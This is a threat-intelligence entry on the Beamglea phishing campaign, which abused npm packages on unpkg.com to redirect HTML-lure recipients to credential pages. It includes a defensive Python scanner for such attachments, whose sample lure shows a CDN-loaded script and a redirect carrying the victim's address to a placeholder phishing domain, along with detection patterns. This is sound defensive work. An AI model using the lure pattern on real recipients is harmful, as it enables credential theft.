175 Malicious npm Packages with 26,000 Downloads Used in Credential Phishing Campaign
Cybersecurity researchers have flagged a new set of 175 malicious packages on the npm registry that have been used to facilitate credential harvesting attacks as part of an unusual campaign. The packages have been collectively downloaded 26,000 times, acting as an infrastructure for a widespread phishing campaign codenamed Beamglea targeting more than 135 industrial, technology, and energy
AI Analysis
Technical Summary
The Beamglea phishing campaign employs 175 malicious npm packages that have collectively been downloaded approximately 26,000 times. These packages are not malicious in the traditional sense of executing harmful code upon installation; instead, they serve as hosting infrastructure for phishing redirect scripts. The attackers use npm's public registry and the unpkg.com CDN to host JavaScript redirect files embedded in HTML documents. A Python script named "redirect_generator.py" automates the creation and publication of npm packages with randomized names containing victim-specific email addresses and phishing URLs. Once published, these packages host JavaScript files (e.g., beamglea.js) that redirect victims to Microsoft credential harvesting pages. The campaign distributes over 630 HTML files masquerading as legitimate business documents such as purchase orders or technical specifications. When victims open these HTML files in a browser, the embedded JavaScript immediately redirects them to phishing domains with their email pre-filled, increasing the attack's credibility and success rate. The campaign targets more than 135 companies in industrial, technology, and energy sectors worldwide, leveraging the npm ecosystem and unpkg CDN to create a resilient, low-cost phishing infrastructure. This approach exploits the trust developers and organizations place in npm packages and CDN-hosted content, highlighting a novel abuse of software supply chain infrastructure without direct exploitation of software vulnerabilities. The campaign was first flagged by researchers in late September 2025 and underscores the evolving tactics of threat actors to use legitimate platforms for malicious purposes.
Potential Impact
European organizations, especially those in industrial, technology, and energy sectors, face significant risk from this campaign. The use of trusted npm packages and CDN infrastructure lowers suspicion and increases the likelihood of successful credential theft, potentially leading to unauthorized access to corporate systems, intellectual property theft, and disruption of critical services. Credential compromise can facilitate further attacks such as lateral movement, ransomware deployment, or espionage. The pre-filled email addresses in phishing pages enhance the credibility of the attack, increasing user susceptibility. The campaign's reliance on legitimate infrastructure complicates detection and mitigation, potentially leading to prolonged exposure. Given the targeting of strategic sectors, successful breaches could have cascading effects on supply chains and critical infrastructure within Europe. Additionally, the abuse of open-source ecosystems may erode trust in software supply chains, impacting development and deployment practices across European organizations.
Mitigation Recommendations
European organizations should implement advanced supply chain security measures, including continuous monitoring and auditing of npm packages used in development environments. Employ strict policies to restrict or vet third-party package usage, especially those with randomized or suspicious names. Integrate automated tools to detect unusual package publication patterns and CDN-hosted redirect scripts. Enhance email security controls to detect and quarantine suspicious HTML attachments, including sandboxing and content disarming. Conduct targeted user awareness training focusing on phishing attacks involving pre-filled credentials and suspicious document attachments. Employ multi-factor authentication (MFA) to reduce the impact of credential compromise. Collaborate with npm registry maintainers and CDN providers to report and expedite takedown of malicious packages. Implement network-level protections such as DNS filtering and web proxy controls to block known phishing domains. Finally, develop incident response playbooks specifically addressing supply chain phishing campaigns leveraging developer ecosystems.
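The mechanism described in the technical summary (an HTML lure that loads a redirect script from a public npm CDN and sends the recipient to a credential page with their address pre-filled) and the recommendation above to detect such attachments at the mail gateway can be turned into a concrete triage check. The Python scanner below is an added example, not code from the original report or from the researchers it cites; the CDN host list beyond unpkg.com, the indicator weights and thresholds, and every sample attachment, package name and domain in it are constructed assumptions.

```python
"""Heuristic triage of HTML e-mail attachments for CDN-hosted redirect lures.

Added example, not code from the original report or the researchers it cites.
It flags the traits the Beamglea write-up describes: a <script src> pointing
at a public npm CDN such as unpkg.com, a client-side redirect primitive, and
a recipient e-mail address baked into the page. All sample attachments,
package names and domains below are constructed placeholders.
"""
import re
from dataclasses import dataclass, field
from html.parser import HTMLParser
from urllib.parse import urlparse

# unpkg.com is named in the report; cdn.jsdelivr.net is an assumed addition
# (another public npm-backed CDN). Tune this set to local policy.
PACKAGE_CDN_HOSTS = {"unpkg.com", "cdn.jsdelivr.net"}

REDIRECT_RE = re.compile(
    r"(?:window\.|document\.|top\.|self\.)?location(?:\.href|\.replace|\.assign)?\s*(?:=(?!=)|\()",
    re.IGNORECASE)
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
META_REFRESH_RE = re.compile(r"^\s*\d+\s*;\s*url=", re.IGNORECASE)


class _Collector(HTMLParser):
    """Collects script sources, inline script bodies, meta refresh and visible text."""

    def __init__(self):
        super().__init__()
        self.script_srcs, self.inline_js, self.text = [], [], []
        self.meta_refresh = False
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "script":
            self._in_script = True
            if a.get("src"):
                self.script_srcs.append(a["src"])
        elif tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            self.meta_refresh = bool(META_REFRESH_RE.match(a.get("content", "")))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        (self.inline_js if self._in_script else self.text).append(data)


@dataclass
class Findings:
    external_scripts: list = field(default_factory=list)
    cdn_scripts: list = field(default_factory=list)
    redirect_primitives: int = 0
    embedded_emails: list = field(default_factory=list)
    meta_refresh: bool = False
    visible_text_chars: int = 0


def scan_html(html: str) -> Findings:
    c = _Collector()
    c.feed(html)
    c.close()
    f = Findings(meta_refresh=c.meta_refresh)
    for src in c.script_srcs:
        host = urlparse(src).hostname or ""
        if not host:
            continue  # relative path: nothing is fetched from a third party
        f.external_scripts.append(src)
        if host in PACKAGE_CDN_HOSTS or any(host.endswith("." + h) for h in PACKAGE_CDN_HOSTS):
            f.cdn_scripts.append(src)
    js = "\n".join(c.inline_js)
    f.redirect_primitives = len(REDIRECT_RE.findall(js))
    # An address inside script code or a script URL is the pre-fill hallmark;
    # addresses in visible body text (a signature block) are normal and ignored.
    f.embedded_emails = sorted(set(EMAIL_RE.findall(js + "\n" + "\n".join(c.script_srcs))))
    f.visible_text_chars = len("".join(c.text).strip())
    return f


def risk_score(f: Findings) -> int:
    """Weighted sum of indicators, capped at 100; the weights are a tuning assumption."""
    score = 0
    if f.cdn_scripts:
        score += 40
    if f.redirect_primitives:
        score += 25
    if f.embedded_emails:
        score += 25
    if f.meta_refresh:
        score += 15
    # A "document" with almost no visible text exists only to run its script.
    if f.visible_text_chars < 50 and (f.external_scripts or f.redirect_primitives):
        score += 10
    return min(score, 100)


def verdict(html: str) -> str:
    score = risk_score(scan_html(html))
    return "quarantine" if score >= 60 else "review" if score >= 30 else "allow"


# Constructed samples: a lure shaped like the report's description, and an
# ordinary specification sheet with no scripts at all.
SUSPICIOUS_ATTACHMENT = """<!DOCTYPE html><html><head><title>Purchase Order PO-4471</title></head>
<body>
<script src="https://unpkg.com/example-pkg-placeholder@1.0.0/redirect.js"></script>
<script>
  var target = "user@example.com";
  window.location.href = "https://login-example.invalid/?e=" + target;
</script>
</body></html>"""

BENIGN_ATTACHMENT = """<!DOCTYPE html><html><head><title>Technical specification</title></head>
<body><h1>Pump assembly XR-200</h1>
<p>Rated flow 120 l/min at 4 bar. Housing: cast aluminium. Seal: EPDM.</p>
<p>Contact sales via the customer portal for pricing and lead times.</p>
</body></html>"""

if __name__ == "__main__":
    for name, doc in (("suspicious", SUSPICIOUS_ATTACHMENT), ("benign", BENIGN_ATTACHMENT)):
        f = scan_html(doc)
        print(f"{name}: score={risk_score(f)} verdict={verdict(doc)} "
              f"cdn={f.cdn_scripts} emails={f.embedded_emails}")
```

At a gateway this would run over every text/html part and every attachment with an .html or .htm name; "quarantine" holds the message, "review" routes it to an analyst queue. Because the script file itself is served from the CDN, the scanner deliberately scores the reference to a package CDN rather than trying to fetch and analyse the remote code, which keeps the check offline and avoids signalling the sender.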
Affected Countries
Germany, France, United Kingdom, Italy, Spain, Netherlands, Belgium, Sweden, Poland, Finland
Technical Details
- Article Source: https://thehackernews.com/2025/10/175-malicious-npm-packages-with-26000.html (fetched 2025-10-11T01:08:52Z, about 1,150 words)
Threat ID: 68e9ae2654cfe91d8fe9e2e1
Added to database: 10/11/2025, 1:08:54 AM
Last enriched: 10/11/2025, 1:10:07 AM
Last updated: 10/11/2025, 11:17:42 AM